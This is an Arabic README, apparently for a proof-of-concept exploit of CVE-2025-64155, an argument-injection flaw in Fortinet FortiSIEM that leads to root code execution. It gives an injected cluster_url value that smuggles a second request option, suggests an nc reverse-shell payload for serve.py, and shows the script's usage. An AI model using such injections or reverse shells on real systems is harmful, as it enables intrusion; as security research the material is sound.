
CVE-2025-64155: Fortinet FortiSIEM حقن الوسائط المؤدي إلى تنفيذ التعليمات البرمجية عن بُعد
استغلال إثبات المفهوم (Proof of Concept) لـ Fortinet FortiSIEM يستغل حقن الوسائط (argument injection) لكتابة ملف بهدف الحصول على تنفيذ تعليمات برمجية بصلاحيات الجذر (root)
التحليل المتعمق هنا: Horizon3.ai - CVE-2025-64155: ثلاث سنوات من الحصول على صلاحيات الجذر عن بُعد في Fortinet FortiSIEM
من المرجح أن يؤدي استغلال هذه الثغرة لاستبدال ملفات التطبيق إلى عدم استقرار النظام. استخدم بحذر. يمكن تشغيل الفحوصات بشكل غير ضار عن طريق تعديل cluster_url لتصبح: <cluster_url>http://127.0.0.1:80 --next http://<INTERACTSH_URL></cluster_url>
serve.py إلى الحمولة المطلوبة (مثل: nc reverse shell)serve.pyCVE-2025-64155.py% python3 CVE-2025-64155.py -h
usage: CVE-2025-64155.py [-h] -t TARGET [-p PORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-p PORT, --port PORT The port of the Phoenix Monitor service
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في الحالات المصرَّح بها صراحةً. القائمون على المشروع غير مسؤولين عن سوء استخدام هذا البرنامج. استخدمه بمسؤولية.